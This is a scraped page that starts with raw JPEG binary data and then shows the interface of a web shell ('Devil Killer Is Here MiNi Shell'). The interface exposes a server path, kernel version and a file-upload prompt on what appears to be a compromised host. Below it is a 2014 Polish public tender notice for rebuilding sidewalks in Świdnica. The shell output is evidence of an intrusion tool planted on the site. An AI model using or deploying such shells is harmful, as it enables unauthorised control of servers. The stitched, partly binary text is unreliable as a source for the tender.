JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140409/77317-N-2014.html

<p class="kh_header"><b>Świdnica: Wykonanie robót budowlanych pod nazwą: Przebudowa chodników na terenie miasta Świdnicy</b><br>
<b>Numer ogłoszenia: 77317 - 2014; data zamieszczenia: 09.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych pod nazwą: Przebudowa chodników na terenie miasta Świdnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	OPIS PRZEDMIOTU  ZAMÓWIENIA
3.1.     Przedmiot  zamówienia 
3.1.1	Przedmiotem zamówienia są roboty budowlane związane z budową lub przebudową chodników na terenie miasta Świdnicy, z podziałem na zadania:
1)	Zadanie 1 - Przebudowa chodnika przy ul. Wrocławskiej po stronie numerów parzystych, od nr 70 - nr 92, wraz z przebudową zjazdów do sąsiadujących posesji, zgodnie z rysunkiem nr 1 (zał. C do SIWZ).
2)	Zadanie 2 obejmuje:
a)	zadanie 2a - przebudowa chodników przy ul. gen. Ignacego Prądzyńskiego w rejonie skrzyżowania                                         z  ul. Kard. Stefana Wyszyńskiego, na wysokości  numerów 43a i 41 - zgodnie z rysunkiem nr 2a,
b)	zadanie 2b - przebudowa chodnika przy ul. gen. Ignacego Prądzyńskiego w rejonie skrzyżowania                             z ul. gen. Mariana Langiewicza, na wysokości  numerów 1 - 3,  zgodnie z rysunkiem nr  2b 
3)	Zadanie 3 - Przebudowa chodnika przy ul. gen. Jarosława Dąbrowskiego, po stronie numerów nieparzystych, od nr 47 - nr 57, zgodnie z rysunkiem  nr 3,
4)	Zadanie 4 - Przebudowa odcinków chodników na os. Zawiszów po stronie numerów parzystych,                        ul. J. Niemcewicza  od  nr 2 - 4 i ul. Władysława Łokietka od nr 6 - 8; zgodnie z rysunkiem nr 4,
5)	Zadanie 5 - Przebudowa chodnika przy ul. Sprzymierzeńców w Świdnicy, po stronie numerów nieparzystych - zgodnie z rysunkiem 5.
6)	Zadanie 6 - Przebudowa odcinków chodników przy ul. Saperów w Świdnicy, w rejonie skrzyżowania                   z ul. Kościelną, na wysokości nr 27a  -  zgodnie z rysunkiem nr 6,
7)	Zadanie 7 - Przebudowa chodnika przy ul. Gdyńskiej w Świdnicy, na odcinku od skrzyżowania                               z ul. Waleriana Łukasińskiego do budynku PAFAL-u - zgodnie z rysunkiem nr 7.                                     
3.1.2	Zadanie obejmuje wykonanie robót objętych Zgłoszeniem robót budowlanych do Starostwa Powiatowego                   w  Świdnicy.
3.3.     Lokalizacja 
3.3.1.	Przedmiot zamówienia usytuowany jest w n/w lokalizacjach:
1)	Zadanie1 - chodnik przy ul. Wrocławskiej - działka drogowa drogi gminnej nr 21; Obręb ewidencyjny -  0003  Fabryczna          
2)	Zadanie 2- odcinki chodników przy ul. I. Prądzyńskiego -działki drogowe drogi gminnej nr:  245, 251, 248; Obręb  ewidencyjny  - 0001 Osiedle Młodych, 
3)	Zadanie 3 - chodnik przy ul. J. Dąbrowskiego - działka drogowa drogi gminnej nr  256;  Obręb ewidencyjny - 0001 Osiedle Młodych, 	
4)	Zadanie 4- odcinki chodników na Os. Zawiszów - działki drogowe dróg gminnych nr: 125, 133 i 134; Obręb ewidencyjny - 0002 Zawiszów.
5)	Zadanie 5 - odcinek chodnika przy ul. Sprzymierzeńców - działka drogowa nr 2969; Obręb ewidencyjny - 0004 Śródmieście
6)	Zadanie 6 - odcinek chodnika przy ul. Saperów - działka drogowa nr 832;  Obręb ewidencyjny - 0004 Śródmieście 
7)	Zadanie 7 - odcinek chodnika przy ul. Gdyńskiej- działka drogowa nr 328;  Obręb ewidencyjny - 0004 Śródmieście .
 
3.3.2.	Zamawiający zaleca dokonania wizji lokalnej terenu przeznaczonego pod realizację przedmiotu zamówienia.
3.3.3.	Lokalizację przedmiotu zamówienia dla poszczególnych zadań przedstawiają rysunki nr odpowiednio                  1, 2a-2b, 3-7 do Dokumentacji (załącznik C do SIWZ).
3.4.     Zakres przedmiotu zamówienia 
3.4.1	Zakres przedmiotu zamówienia dla poszczególnych zadań:
-------------------------------------------------------------------------------------------------------------------------------------------------------
Zadanie 1 - przebudowa chodnika ul. Wrocławska - polegająca na zmianie istniejącej nawierzchni gruntowej chodnika na nawierzchnię z kostki brukowej betonowej na odcinku długości ok. 277  mb, 
1) pow. przebudowy -  ok. 668 m2, przy czym:
a)	ok. 445 m2 - pow. chodnika - o konstrukcji wg ust. 3.5, pkt 1) - oznaczona na rys. nr 1 kolorem niebieskim,
b)	ok. 223 m2  - pow. wjazdów - o konstrukcji wg ust. 3.5,  pkt 2)  - oznaczonych  na rys. nr 1 kolorem brązowym,
2) pow. wjazdu istniejącego, który należy przełożyć w celu dostosowania do projektowanej niwelety -  ok. 18 m2 .
Roboty budowlane obejmują: 
1)	wykonanie koryta wraz z wywozem urobku oraz zagęszczenie i wyprofilowanie podłoża:
a)	chodnik - na głębokość 26 cm, na pow. ok. 445 m2 - ok. 115,7 m3 (na odcinku oznaczony na rys. nr 1 kolorem niebieskim),
b)	wjazdy - na głębokość 36 cm, na pow. ok. 223 m2 - ok. 80,28 m3 (na odcinku oznaczony na rys. nr 1 kolorem brązowym),
2)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni ok. 668 m2 , przy czym:
a)	o konstrukcji warstw jak w ust. 3,5, pkt 1). - na pow. ok. 445 m 2 ( na odcinku oznaczonym na rys. nr 1 kolorem niebieskim),
b)	konstrukcji warstw jak w ust. 3,5, pkt 2). - na pow. ok. 223 m 2  (odcinek oznaczony   na rys. nr 1 kolorem brązowym) 
3)	ułożenie obrzeża betonowego wibroprasowanego o wymiarach: 8 x 30 cm, na ławie betonowej (beton B15) z oporem - ok. 332 mb,
4)	demontaż krawężników istniejących - ok. 277 mb, z czego 188 mb to krawężnik kamienny do odzysku, który należy po zdemontowaniu przewieźć na składowisko MZEC-u przy ul. Rolniczej w Świdnicy (odległość do 2 km),
5)	ułożenie krawężnika betonowego wibroprasowanego o wymiarach 15 x 30 cm, na ławie betonowej z betonu B15, z oporem -  ok.  277 mb, przy czym na wjazdach (tj. długości ok. 56 mb) krawężniki należy  obniżyć,
6)	regulacja niwelety zasuw wodociągowych - szt. 3,
7)	remont cząstkowy jezdni masą asfaltową gr. 6 cm  na podbudowie  z tłucznia gr. 15 cm - na długości                  277 mb  i szerokości 30 cm od krawężnika, pow. remontowana - 83,10 m2
-------------------------------------------------------------------------------------------------------------------------------------------------------
 Zadanie 2: 
Zadanie 2a  -  przebudowa 2 odcinków chodnika o łącznej długości   ok. 82 mb polegająca na:
1)	wymianie nawierzchni istniejącej z kostki brukowej betonowej o gr.  6 cm na  kostkę brukową betonową  gr. 8 cm (łączna pow. ok. 270m2) - oznaczono na rys. 2a kolorem niebieskim,
2)	poszerzeniu chodnika istniejącego, tj. wykonaniu nawierzchni z kostki betonowej gr. 8 cm na gruncie  -  na łącznej pow. ok. 97 m2 - oznaczono na rys. 2a kolorem brązowym
Roboty budowlane obejmują: 
1)	rozebranie istniejącej nawierzchni z kostki brukowej betonowej gr. 6 cm - ok. 270 m2
2)	rozebranie istniejącego obrzeża betonowego - ok. 146 mb,
3)	wykonanie koryta wraz z wywozem urobku oraz wyprofilowanie podłoża:
-	na głębokość 20 cm , na pow. ok. 270 m2  - ok. 54 m3 
-	na głębokość 26 cm , na pow. ok. 97m2 - ok. 25,22 m3 
4)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni łącznej ok. 367 m2 - o konstrukcji warstw jak w ust. 3,5, pkt 1) 
5)	ułożenie obrzeża betonowego wibroprasowanego o wymiarach: 8 x 30 cm, na ławie betonowej (beton B15) z oporem - ok. 77 mb,
6)	demontaż starego krawężnika na przejściach dla pieszych  i ułożenie nowego krawężnika betonowego wibroprasowanego   (obniżonego) o wymiarach 15 x 30 cm, na ławie betonowej z betonu B15,  z oporem                 -  ok. 16 mb,
7)	ułożenie na przejściach dla pieszych płytek dla osób niewidomych,
8)	regulacja pionowa studni telekomunikacyjnej - szt. 1,
9)	uporządkowanie terenów zielonych sąsiadujących z chodnikiem na szer. ok. 1,0 m - ok. 75 m2   
Zadanie 2b  -  przebudowa odcinka chodnika, polegająca na wymianie istniejącej nawierzchni betonowej chodnika na nawierzchnię z kostki brukowej betonowej gr. 8 cm, o łącznej dł. ok. 35 mb i powierzchni ok.  97 m2; 
Roboty budowlane obejmują: 
1)	rozebranie ok. 97  m2  istniejącej nawierzchni betonowej gr. 14 cm wraz z wywozem gruzu, 
2)	rozebranie istniejącego obrzeża betonowego - ok. 65 mb,
3)	wykonanie koryta na głębokość 12 cm na pow. ok. 97 m2  wraz z wywozem urobku (ok. 11,64 m3) oraz zagęszczenie i wyprofilowanie podłoża,
4)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni ok. 97 m2 , o konstrukcji warstw jak w ust. 3,5, pkt 1).
5)	ułożenie obrzeża betonowego wibroprasowanego o wymiarach: 8 x 30 cm, na ławie betonowej (beton B15) z oporem,  - ok. 65 mb,
6)	na przejściu dla pieszych - rozebranie istniejącego krawężnika i montaż nowego, obniżonego krawężnika - na dł. ok. 4 mb - zgodnie z rys. 2b,
-------------------------------------------------------------------------------------------------------------------------------------------------------
Zadanie 3 - przebudowa chodnika polegająca na wymianie istniejącej nawierzchni betonowej chodnika na nawierzchnię z kostki brukowej betonowej gr. 8 cm,  na odcinku długości ok. 69 mb, pow. przebudowy ok. 200 m2 
Roboty budowlane obejmują: 
1)	rozebranie ok. 200 m2 istniejącej nawierzchni betonowej gr. 14 cm wraz z wywozem gruzu, 
2)	wykonanie koryta na głębokość 12 cm na pow. ok. 200 m2  wraz z wywozem urobku (ok. 24m3) oraz zagęszczenie i wyprofilowanie podłoża,
3)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni ok. 200 m2, o konstrukcji warstw jak w ust. 3,5, pkt 1),
4)	demontaż starego i ułożenie nowego obrzeża betonowego wibroprasowanego o wymiarach: 8 x 30 cm, na ławie betonowej (beton B15) z oporem - ok. 50 mb,
5)	demontaż starego i ułożenie nowego krawężnika betonowego wibroprasowanego o wymiarach 15 x 30 cm, na ławie betonowej z betonu B15, z oporem - ok. 69 mb, przy czym na długości ok. 14 mb krawężniki należy obniżyć (miejsca obniżenia wskazane na rys. nr 3).
6)	regulacja niwelety:
a)	studni kanalizacji sanitarnej     - szt. 1,
b)	studni kanalizacji deszczowej  - szt. 3,
c)	studni telekomunikacyjnej SK-2 - szt. 1,
d)	zasuw wodociągowych - szt. 2.
7)	remont cząstkowy jezdni masą asfaltową gr. 6 cm  na podbudowie  z tłucznia gr. 15 cm - na długości                 ok. 68 mb i szerokości 30 cm od krawężnika, pow. remontowana - ok. 20,40 m2 
-------------------------------------------------------------------------------------------------------------------------------------------------------
Zadanie 4 - przebudowa odcinków chodnika, polegająca na wymianie istniejącej nawierzchni betonowej chodnika na nawierzchnię z kostki brukowej betonowe gr. 8 cm, łączna  długość odcinków - ok. 67 mb, pow. przebudowy -                 ok. 277 m2.
Roboty budowlane obejmują: 
1)	rozebranie ok. 277 m2 istniejącej nawierzchni betonowej gr. 14 cm wraz z wywozem gruzu, 
2)	wykonanie koryta na głębokość 12 cm na pow. ok. 277 m2  wraz z wywozem urobku (ok. 33,24m3) oraz zagęszczenie i wyprofilowanie podłoża,
3)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni ok. 277 m2, o konstrukcji warstw jak w ust. 3,5, pkt 1).
4)	demontaż starego i ułożenie nowego obrzeża betonowego wibroprasowanego o wymiarach: 8 x 30 cm,                na ławie betonowej (beton B15), z oporem - ok. 68 mb,
5)	regulacja niwelety:
a)	studni kanalizacji sanitarnej     - szt. 1,
b)	zasuwy wodociągowej - szt. 1.
-------------------------------------------------------------------------------------------------------------------------------------------------------
Zadanie 5 - przebudowa chodnika polegająca na wymianie istniejących nawierzchni chodnika (mieszanej: betonowej, asfaltowej z kostki granitowej) na nawierzchnię z kostki brukowej betonowej gr. 8 cm,  na odcinku długości  ok. 229 mb, pow. przebudowy ok. 565,50 m2 
Roboty budowlane obejmują: 
1)	rozebranie ok. 559 m2 istniejących nawierzchni (z pominięciem wjazdów - zgodnie z rys. nr 7):
a)	asfaltowej gr. 3-4 cm - ok. 175,00 m2, wraz z wywozem odpadów do utylizacji,
b)	kostka granitowa 4/6 - ok. 56m2 - kostka przewidziana do odzysku; po zdemontowaniu kostkę przewieźć na składowisko MZEC-u przy ul. Rolniczej w Świdnicy (odległość do 2,5  km),
c)	kostka betonowa 9/11 - 2 m2 - do wykorzystania na uzupełnienie ubytków na wjazdach
d)	płyty betonowe  120 x 80 cm, gr. ok. 10 cm - 248 szt. - 20%, tj. ok. 50 szt.  przewidziana do odzysku; odzyskany materiał należy przewieźć  jw., gruz należy wywieźć na składowisko odpadów,
2)	demontaż istniejącego krawężnika kamiennego usytuowanego pomiędzy istniejącym chodnikiem                              i zieleńcem  - ok. 222  mb - po zdemontowaniu krawężnik należy  przewieźć na składowisko MZEC-u przy          ul. Rolniczej  w Świdnicy (odległość do 2,5 km),
3)	wyprofilowanie i zagęszczenie podłoża - ok. 565,5 m2 
4)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni ok. 561,5 m2, o konstrukcji warstw jak    w ust. 3,5, pkt 1),
5)	wykonanie przejścia dla pieszych, w tym: rozbiórka i ponowne ułożenie obniżonego krawężnika (ok. 4 mb), ułożenie 2 rzędów płytek dla osób niewidomych (ok. 2,5 m2), ułożenie chodnika jak w pkt. 4)  - ok.  4 m2
6)	ułożenie obrzeża betonowego (w miejsce zdemontowanego krawężnika) wibroprasowanego o wymiarach:                     8 x 30 cm, na ławie betonowej (beton B15)  z oporem - ok. 222 mb,
7)	regulacja niwelety:
a)	studni telekomunikacyjnej - szt. 4,
b)	wpust kanalizacji deszczowej - 1 szt.
-------------------------------------------------------------------------------------------------------------------------------------------------------Zadanie 6 - przebudowa chodnika polegająca na wymianie istniejącej nawierzchni chodnika z płyt betonowych            gr. ok. 5 cm, na nawierzchnię z kostki brukowej betonowej gr. 8 cm,  na odcinku długości ok. 22 mb, pow. przebudowy ok. 71 m2 - zgodnie z rysunkiem nr 6.
Roboty budowlane obejmują: 
1)	rozebranie ok. 71 m2 istniejącej nawierzchni z płyt  betonowych  grubości ok. 5 cm wraz z wywozem gruzu, 
2)	wykonanie koryta na głębokość ok. 21 cm na pow. ok. 71m2  wraz z wywozem urobku (ok. 15m3) oraz zagęszczenie i wyprofilowanie podłoża,
3)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni - ok. 71 m2, o konstrukcji warstw jak w ust. 3,5, pkt 1),
4)	na przejściach dla pieszych:
a)	regulacja  krawężnika kamiennego - 8,0 mb, 
b)	ułożenie płytek dla osób niewidomych,
5)	ponowne ułożenie kostki brukowej jezdni - na szer. 2 rzędów kostki i długości regulowanego krawężnika (ok. 8,0 mb) 
6)	regulacja niwelety zasuwy  wodociągowej - szt. 1.
-------------------------------------------------------------------------------------------------------------------------------------------------------
Zadanie7 - przebudowa chodnika polegająca na wymianie istniejącej nawierzchni betonowej gr. ok. 12 cm, na nawierzchnię z kostki brukowej betonowej gr. 8 cm,  na odcinku długości ok. 52 mb, pow. przebudowy ok. 133 m2,               w tym:
1)	powierzchnia chodnika -  ok. 124m2,
2)	powierzchnia wjazdu na posesję - ok. 9,0 m2 
Roboty budowlane obejmują: 
1)	Rozbiórka istniejącej  nawierzchni betonowej gr. ok. 12 cm, - ok. 133 m2
2)	wykonanie koryta wraz z wywozem urobku oraz zagęszczenie i wyprofilowanie podłoża:
a)	chodnik - na głębokość 14 cm, na pow. ok. 124 m2 - ok. 17,4 m3 (na odcinku oznaczony w rys. nr 1 kolorem niebieskim),
b)	wjazdy - na głębokość  24 cm, na pow. ok. 9 m2 - ok. 2,16 m3 (na odcinku oznaczony w rys. nr 1 kolorem brązowym),
3)	wykonanie chodnika z kostki brukowej betonowej gr. 8 cm na powierzchni ok. 133 m2 , przy czym:
a)	konstrukcji warstw jak w ust. 3,5, pkt 1). - na pow. ok. 124 m 2 ( na odcinku oznaczonym  w rys. nr 1 kolorem niebieskim),
b)	konstrukcji warstw jak w ust. 3,5, pkt 2). - na pow. ok. 9 m 2  (odcinek oznaczony   w rys. nr 1 kolorem brązowym) 
4)	demontaż starych obrzeży betonowych - ok. 20,5 mb 
5)	ułożenie nowych obrzeży betonowych, wibroprasowanych o wymiarach: 8 x 30 cm, na ławie betonowej (beton B15)  z oporem - ok. 24 mb,
6)	regulacja  istniejącego krawężnika kamiennego na wjeździe (tj. długości ok. 4 mb) - krawężniki należy  obniżyć,
7)	ponowne ułożenie kostki brukowej jezdni - na szer. 2 rzędów kostki i długości regulowanego krawężnika (ok.4,0 mb) 
8)	regulacja niwelety studni telekomunikacyjnych - 3 szt.
-------------------------------------------------------------------------------------------------------------------------------------------------------
3.4.2	geodezyjną inwentaryzację powykonawczą dla prac zrealizowanych w ramach przedmiotu zamówienia, przy czym:
1)	Wykonawca dostarczy mapę zasadniczą z naniesionymi zmianami, zatwierdzoną przez Powiatowe Biuro Geodezji i Katastru w Świdnicy, w skali 1:500, w wersji:
- papierowej  - 1 egz. ; - elektronicznej - 1 egz. (cała sekcja),
2)	parametry zeskanowanej mapy winny być następujące:
-  skan w rozdzielczości min. 300 DPI,  
 - kolor 2 bity (czarno - białe)
-  cała sekcja mapy  
 -  przycięta  do ramki,   
- zapis w postaci pliku TIFF na płycie CD
3)	treść mapy nie może zostać przysłonięta przez inne elementy umieszczone na mapie np. pieczątki, linie określające obszar opracowania, metryki, zamalowania itp.
3.4.3	Inne prace niezbędne do należytego wykonania przedmiotu zamówienia, w tym:
1)	wykonanie,  uzgodnienie oraz zatwierdzenie projektów  tymczasowej organizacji ruchu na czas prowadzenia robót budowlanych,
2)	oznakowanie placu budowy, 
3)	organizację zaplecza budowy ( miejsce, pobór energii, wody, dozorowanie itd.),
4)	bieżący wywóz materiałów nieużytecznych z terenu budowy na składowisko odpadów oraz i ich unieszkodliwienie o ile będzie to konieczne,
5)	uporządkowanie i doprowadzenie do stanu pierwotnego terenu sąsiadującego z placem budowy po zakończeniu wszystkich robót  objętych zamówieniem,
6)	niezwłoczne zawiadomienie Zamawiającego o wszelkich zagrożeniach lub nowych okolicznościach wynikłych w trakcie prowadzenia robót,
7)	sporządzenie planu bezpieczeństwa i ochrony zdrowia,
8)	inne czynności wynikające ze specyfiki danych robót.
3.4.4	Zakres obszarowy przedmiotu zamówienia przedstawiają rysunki nr odpowiednio 1 - 7 do Dokumentacji (załącznik C do SIWZ).

3.5.     Charakterystyka robót
Dla zadań 1) - 7) przyjęto n/w konstrukcje nawierzchni:
1)    konstrukcja nawierzchni chodników:
-	nawierzchnia z kostki betonowej gr. 8 cm,
-	podsypka z miału kamiennego o uziarnieniu ciągłym  0 - 4 mm - gr. 3 cm,
-	podbudowa z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 4 - 31 mm,                     o grubości warstwy 15 cm,
Łączna gr. konstrukcji nawierzchni - 26 cm
2)    konstrukcja nawierzchni na wjazdach do posesji:
-	nawierzchnia z kostki betonowej gr. 8 cm,
-	podsypka z miału kamiennego o uziarnieniu ciągłym  0 - 4 mm - gr. 3 cm,
-	podbudowa z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 4 - 31 mm,                     o grubości warstwy 15 cm,
-	grunt stabilizowany spoiwem hydraulicznym  -10 cm,
Łączna gr. konstrukcji nawierzchni - 36 cm

3)	obrzeża betonowe wibroprasowane o wymiarach: 8 x 30 cm, na ławie betonowej (beton B15) z oporem (łączny przekrój - ok. 0,036 m2) - zgodnie z rys. nr 8,
4)	krawężniki betonowe wibroprasowane o wymiarach 15 x 30 cm, na ławie betonowej (betonu B15) z oporem (łączny przekrój - ok. 0,0675 m2) - zgodnie z rys. nr 9
5)	wysokość krawężnika nad pow. jezdni - 12,0 cm,
6)	obniżenie krawężnika na przejściach dla pieszych do 2 cm, 
7)	przejścia dla pieszych  wyposażone  w 2 rzędy płytek chodnikowych  w kolorze żółtym, z wypustkami dla osób niewidomych,
8)	Odwodnienie chodników  -  powierzchniowe,  poprzez spadki poprzeczne 2% w kierunku istniejącej nawierzchni jezdni, a następnie do istniejących wpustów ulicznych. 

3.6.      Przedmiot zamówienia szczegółowo został opisany w: 
3.6.1.	dokumentacji, stanowiącej załącznik C do SIWZ, obejmującej rysunki nr 1 - 9 i Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót, 
3.6.2.	niniejszym SIWZ
3.6.3.	Dokumentacja, o której mowa w pkt. 3.6.1. a także  przedmiar robót, stanowiący  zał. D  do SIWZ
znajduje się na stronie internetowej Zamawiającego www.swidnica.bip-gov.info.pl  w katalogu zamówienia publiczne. Dokumentacja projektowa w wersji papierowej jest do wglądu w siedzibie Zamawiającego - Urząd Miejski w Świdnicy, ul. Armii Krajowej nr 49, Referat  Dróg - pok. 311.

Uwaga!  
Przedmiary robót ma charakter wyłącznie poglądowy i został załączony pomocniczo w celu  ułatwienia dokonania wyceny oferty przez Wykonawcę. Przedmiar robót nie stanowi opisu przedmiotu zamówienia. 

4.   WYMAGANY TERMIN  REALIZACJI PRZEDMIOTU  ZAMÓWIENIA 
4.1	Okres realizacji przedmiotu zamówienia ustala się na:

a)	przekazanie placu budowy nastąpi najpóźniej w terminie 10 dni od dnia podpisania umowy.
b)	rozpoczęcie realizacji:     -     w dniu protokolarnego przekazania placu budowy,
c)	zakończenie realizacji najpóźniej do 30 września 2014 r. rozumiany jest jako data podpisania końcowego protokołu odbioru robót ostatniego wykonanego zadania.

4.2	Wykonawca przed podpisaniem umowy o wykonanie niniejszego przedmiotu zamówienia sporządzi                  i uzgodni z Zamawiającym Harmonogram rzeczowy realizacji robót
4.3	Zamawiający zastrzega sobie prawo wskazania robót , które Wykonawca będzie miał obowiązek wykonać                w pierwszej kolejności
4.4	Harmonogram winien określać  
4.3.1	kolejność w jakiej Wykonawca po uzgodnieniu z Zamawiającym będzie realizował poszczególne zadania, 
4.3.2	datę rozpoczęcia oraz datę zakończenia prac realizowanych w ramach poszczególnych zadań.
4.5	Określona w harmonogramie data zakończenia realizacji danego zadania jest przez Zamawiającego rozumiana jako data podpisania protokołu odbioru robót wykonanych w ramach tego zadania. 
4.6	Harmonogram będzie załącznikiem do umowy o roboty budowlane. 
4.7	Wykonawca rozpocznie roboty budowlane bez zbędnej zwłoki i następnie będzie prowadził roboty                           z należytym pospiechem i bez opóźnienia , aby ukończyć je w terminie oznaczonym w ust.  4.1. pkt c, wliczając  w to czas konieczny na przeprowadzenie z powodzeniem prób, sprawdzeń, pomiarów itp. 

5.  GWARANCJA I RĘKOJMIA
